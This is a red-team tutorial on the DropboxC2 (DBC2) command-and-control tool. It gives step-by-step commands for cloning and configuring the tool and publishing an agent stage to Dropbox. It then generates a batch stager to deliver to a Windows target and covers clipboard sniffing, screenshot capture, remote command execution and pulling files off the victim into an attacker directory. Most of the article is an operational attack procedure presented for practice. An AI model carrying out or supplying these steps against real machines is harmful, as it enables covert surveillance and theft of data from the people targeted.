Red Teaming

Command and Control with DropboxC2

In this article, we will learn how to use DropboxC2 tool. It is also known as DBC2.

Table of Content:

  • Introduction
  • Installation
  • Getting Dropbox API
  • Exploiting Target
  • Sniffing Clipboard
  • Capturing Screenshot
  • Command Execution
  • File Download

Introduction                              

DBC2 is primarily a tool for post-exploitation. It has an agent running on the target’s machine, a controller, running on any machine, PowerShell modules, and Dropbox servers as a means of communication. It is inspired by the PowerShell Empire Framework. This tool is developed using python. The credit for developing this tool goes to Arno0x0x.

For this particular demonstration,

Attacker: Kali Linux

Target: Windows 10

Installation

To begin, first, we need the tool on our Attacker Machine. To do this, we will clone the tool directly from the GitHub.

git clone https://github.com/Arno0x/DBC2

After running the above command, we would have a directory created by the name of DBC2. Now, we will traverse inside that directory using the cd command. After that, we are going to need to install the dependencies of the tool. There are multiple ways to do this, but here we are using pip command along with a requirements.txt file that we cloned from git earlier.

cd DBC2/
pip install -r requirements.txt

Getting Dropbox API

Now, this tool uses the Dropbox Servers as the medium to run agents on the target machine. In order to do that, this tool requires a Dropbox API. To get that, first, create an account on Dropbox. Then after creating the account, head to developer tools here. A webpage will open similar to the one shown below. Here we will select the “Dropbox API”. Then in the type of access section, we will choose “App folder”. Name the app as per choice. Then click on Create App Button to proceed.

This will lead to another webpage as shown below. Here, move on to the O Auth 2 Section, and 

Generate access token. This will give the Dropbox API required for this particular practical.

Copy the Generated access token, now get to the directory we cloned earlier. Here we have a file named config.py. We will open it using nano command and paste the Access token as the value for “defaultAccessToken” as shown in the given screenshot given below.

Exploiting Target

Now, it’s time to run the tool, check for appropriate permission before running the tool. As we run the tool, we are greeted with a cool looking banner as shown in the given below. Followed by some details about the Author and Version and tool. After this, it will ask for a master password which will be used to encrypt all the data between the agents and the controller. Enter the password of choice. It will encrypt the password entered and display the result. We can copy the code shown and add to the config.py file so that it doesn’t ask again for a master password. After this, it will create an incoming directory inside the Directory we cloned earlier. This will be used as a buffer to save files from the target.

python dropboxC2.py

This tool requires to upload the modules and stager on Dropbox before proceeding further. We will do this using the command given below.

publishStage dbc2_agent.exe

This will upload a file on the Dropbox as shown in the image given below. This file is encrypted using XOR encryption.

Now let’s check if the stage is published using the command given below:

listPublishedStage

Now that stage is uploaded, let’s use it to create a stager. We are going to create a batch file. But we can use many other types of stager options. This tool provides stager in macro, oneliner, JavaScript, MS build sct and much more. This command will create a stager.bat in the tmp directory. We sent this bat file to our target machine.

genStager batch default

After the batch file is executed on the target machine, we will be informed with a message on the terminal that Agent found with ID. Now we will use the list command to see the list of the agents. And then we will copy the AgentID and then use it to interact with the session as shown in the given image.

list
use [AgentID]

This will create a file on the Dropbox with the .status extension as shown in the given image.

Clipboard Sniffing

We can get the clipboard data that the target has on its clipboard. That is., the data he/she has copied. To do this we will have to start a sniffer using the command clipboardLogger start. Then wait till the target copies some data. Then Stop the sniffer using the command clipboardLogger stop. After stopping the sniffer the clipboard will be saved in a text file inside the incoming directory.

clipboardLogger start
clipboardLogger stop

Let’s take a look at what target copied on his/her machine. We are going to use the cat command on a new Kali terminal to read the file as shown in the given image.

cat /root/DBC2/incoming/clipboardlogger.txt

Capturing Screenshot

Now furthermore we can grab a screenshot of then target machine. To do this we will use the screenshot command as shown in the given image.

screenshot

The screenshot will be captured and stored in the incoming directory. We can see that the target is browsing a website on his/her machine in the given image.

Command Execution

We can run some PowerShell commands on the target machine using the parameter cmd. This tool doesn’t offer the shell but it can execute one command at a time. So, we type cmd and then it asks the command that is to be executed. Here we run the command dir. And we have the list of files as shown in the given image.

cmd
dir

File Download

Furthermore, we can download files from the target. To do this we will have to use the command getFile followed by the file name or path. This will download the file form the target to our attacker machine.

getFile sharetext.txt

The tool will download the file inside the incoming directory we discussed earlier. We can view the file using cat command as shown in the image given below.

cat /root/DBC2/incoming/sharetext.txt

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here